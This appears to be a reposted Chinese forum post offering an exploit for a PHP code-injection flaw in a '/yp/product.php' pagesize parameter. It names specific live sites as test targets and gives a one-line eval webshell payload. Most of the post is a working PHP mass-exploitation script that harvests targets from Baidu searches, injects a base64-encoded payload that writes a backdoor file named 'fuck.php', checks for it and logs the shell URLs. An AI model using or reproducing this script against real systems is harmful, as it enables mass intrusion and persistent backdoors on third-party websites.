客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上! 原文: http://www.wooyun.org/bug.php?action=view&id=2984 测试如下: http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()} 测试结果: http://www.cnqiyou.com/yp/product.php?pagesize=${@phpinfo()}
EXP: http://www.cnqiyou.com/yp/product.php?pagesize=${${@eval%28$_POST[cmd]%29}} 直接菜刀链接 https://www.ogeek.net/softs/163997.html 批量EXP: PS:根据百度搜索批量 复制代码 代码如下:<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadBaiduList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file('url.txt'); if (in_array("$url\r\n",$url_list)){ echo "[-] Links repeat\n"; }else{ $fp = @fopen('url.txt', 'a'); @fwrite($fp, $url."\r\n"); @fclose($fp); print_r(" [-] Get ...... $url\r\n"); if(okbug($url)){ $exploit=exploit($url);</p> <p>$ors=okor($url); if ($ors){ echo "[*] Shell:-> ".$url."/yp/fuck.php\n"; $fp = @fopen('shell.txt', 'a'); @fwrite($fp, $url."/yp/fuck.php\r\n"); @fclose($fp); } }else{ print "[-] No Bug!\n"; } } } }</p> <p>function exploit($url){ $host=$url; $port="80"; $content <a href="mailto:='a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'">='a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'</a>; $data = 'POST <a>/yp/product.php?pagesize=${${@eval%28$_POST[a]%29</a>}} HTTP/1.1'."\r\n"; $data .= "X-Forwarded-For: 199.1.88.29\r\n"; $data .= "Referer: <a href="http://$host\r\n">http://$host\r\n</a>"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($content)."\r\n"; $data .= "Cache-Control: no-cache\r\n\r\n"; $data .= $content."\r\n"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host\n"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } }</p> <p>function okor($host){ $tmp = array(); $data = ''; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,"GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, '200') !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ''; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,'GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1'."\r\nHost:$host\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match('/(php.ini)/i',$data)) { return true; }else{ return false; } }</p> <p>function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ''; $nowpage = ($nowpage-1)*10; $fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout); @fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:[url]www.baidu.com[/url]\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode('/',$tmp[1][$i]); $array[] = str_replace('http://','',$row[0]); } return $array; } ?> |
请发表评论